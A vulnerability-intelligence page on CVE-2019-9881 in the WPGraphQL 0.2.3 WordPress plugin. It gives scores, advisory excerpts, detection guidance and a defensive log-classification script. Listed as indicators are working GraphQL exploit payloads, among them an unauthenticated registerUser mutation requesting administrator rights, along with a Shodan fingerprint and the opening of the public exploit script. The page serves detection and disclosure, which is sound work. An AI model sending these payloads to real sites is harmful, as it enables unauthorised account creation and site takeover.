CVE-2019-9881
Published: 2019-06-10
Priority: P279 · medium · 5.3 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 18.83% (96.9th percentile)
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpengine | wpgraphql | — | — |
Detection & IOCs (extracted from sources)
Exploit request payloads seen in the sources:
- {"query": "mutation { createComment(input: { postId: 1, userId: 1, content: \"{{string}}\", clientMutationId: \"{{client}}\" }) { clientMutationId } }"}
- mutation{createComment(input:{postId:<ID>,userId:<ID>,content:"<text>",clientMutationId:"UWHATM8",}){clientMutationId}}
- mutation{registerUser(input:{clientMutationId:"UWHATM8",email:"<email>",password:"<password>",username:"<username>",roles:["administrator"]}){clientMutationId}}
Detection guidance:
- Detect unauthenticated POST requests to /graphql containing the 'createComment' mutation with both 'postId' and 'userId' fields; no authentication headers are required for the request to succeed.
- Successful exploitation returns HTTP 200 with a JSON body containing 'createComment' and 'clientMutationId' keys inside a '{"data":' envelope.
- Detect unauthenticated POST requests to /graphql containing the 'registerUser' mutation with a 'roles:["administrator"]' field, indicating a privilege escalation attempt.
- Shodan/FOFA fingerprint: WordPress sites exposing a /graphql endpoint can be identified via HTTP title 'WordPress' combined with 'graphql', or a body containing '/wp-content/plugins/wp-graphql/'.
- The exploit script uses a fixed clientMutationId string 'UWHATM8' as a canary value; presence of this string in GraphQL mutation payloads is a strong indicator of exploit tool usage.
Caveats:
- The vulnerability affects only WPGraphQL version 0.2.3 and earlier; version 0.3.0 and later are patched. Detections should be scoped to sites running the vulnerable plugin version.
- The exploit covers three related CVEs (2019-9879, 2019-9880, 2019-9881) in the same plugin version; detections targeting the /graphql endpoint may fire on all three.
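The detection criteria above, applied to a few constructed /graphql request records, as an added example that is not from any of the sources listed on this page; the record field names and the sample records are assumptions, while the mutation names, fields and the 'UWHATM8' canary are the page's own indicators:

```python
import json
import re

# Constructed sample of reverse-proxy/WAF request records (not real traffic).
# "authenticated" stands for whether the request carried a WordPress login
# cookie or an Authorization header; "body" is the JSON posted to /graphql.
SAMPLE_REQUESTS = [
    {"path": "/graphql", "authenticated": False,
     "body": '{"query":"mutation{createComment(input:{postId:1,userId:1,content:\\"hi\\",clientMutationId:\\"UWHATM8\\"}){clientMutationId}}"}',
     "status": 200, "response": '{"data":{"createComment":{"clientMutationId":"UWHATM8"}}}'},
    {"path": "/graphql", "authenticated": False,
     "body": '{"query":"mutation{registerUser(input:{clientMutationId:\\"x\\",email:\\"a@b.c\\",password:\\"p\\",username:\\"u\\",roles:[\\"administrator\\"]}){clientMutationId}}"}',
     "status": 403, "response": '{"errors":[{"message":"forbidden"}]}'},
    {"path": "/graphql", "authenticated": True,
     "body": '{"query":"{ posts { nodes { title } } }"}',
     "status": 200, "response": '{"data":{"posts":{"nodes":[]}}}'},
]

CANARY = "UWHATM8"  # fixed clientMutationId used by the public exploit script


def classify(rec):
    """Return the indicator tags that apply to one /graphql request record."""
    tags = []
    if not rec["path"].rstrip("/").endswith("/graphql"):
        return tags
    try:
        query = json.loads(rec["body"]).get("query", "")
    except (ValueError, AttributeError):
        query = rec["body"]
    # Collapse whitespace so 'createComment (input: {' and 'createComment(input:{' match alike.
    flat = re.sub(r"\s+", "", query)
    if not rec["authenticated"] and "createComment(" in flat and "postId:" in flat and "userId:" in flat:
        tags.append("unauth-createComment")  # CVE-2019-9881 request pattern
        if (rec["status"] == 200 and '"data":' in rec["response"]
                and '"createComment"' in rec["response"] and '"clientMutationId"' in rec["response"]):
            tags.append("createComment-succeeded")  # response shape described for a successful post
    if not rec["authenticated"] and "registerUser(" in flat and re.search(r'roles:\[[^\]]*"administrator"', flat):
        tags.append("unauth-registerUser-administrator")  # privilege escalation attempt
    if CANARY in flat:
        tags.append("exploit-tool-canary")
    return tags


def scan(records):
    """Map record index -> tags for every record that raised at least one indicator."""
    return {i: classify(r) for i, r in enumerate(records) if classify(r)}
```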
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.0 | 5.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |
| NVD | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N |
| VulnCheck | — | 5.3 | MEDIUM | — |
GHSA
GHSA-hhwc-x32h-p6qg · ghsa_unreviewed · 2022-05-24 · CVE-2019-9881 [MEDIUM] · CWE-306
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
VulnCheck
wpengine wpgraphql Missing Authentication for Critical Function
vulncheck · 2019 · CVSS 5.3 · CVE-2019-9881 [MEDIUM]
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected: wpengine wpgraphql
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
No detection rules found.
Exploit-DB
WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities
exploitdb · 2019-05-21 · CVE-2019-9881
---
#!/usr/bin/env python
#
# Author: Simone Quatrini of Pen Test Partners
# CVEs: 2019-9879, 2019-9880, 2019-9881
# Tested on Wordpress 5.1.1 and wp-graphql 0.2.3
# https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
import argparse
import requests
import base64
import json
import sys
parser = argparse.ArgumentParser(description="wp-graphql <= 0.2.3 multi-exploit")
parser.add_argument('--url', action='store', dest='url', required=True, help="wp-graphql endpoint. e.g.: http://localhost/wordpress/graphql")
parser.add_argument('--post-comment', nargs=3, action='store', metavar=('postid','userid','commenttext'), dest='comment', required=False, help="Post comment impersonating a specific user. e.g.: --post-co
Nuclei
WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
nuclei · CVSS 5.3 · CVE-2019-9881 [MEDIUM]
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Template:
id: CVE-2019-9881
info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
  author: intelligent-ears
  severity: medium
  description: |
    The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
  impact: |
    An attacker can exploit this vulnerability to post unauthorized comments on WordPress posts, potentially leading to content manipulation and defacement.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vuln
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42 · 2021-04-12 · CVSS 7.5 · CVE-2020-28188 [HIGH]
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Authors: Lei Xu, Yue Guan, Vaibhav Singhal
Published: April 12, 2021
References:
- http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
- https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
- https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
- https://wpvulndb.com/vulnerabilities/9282
- https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/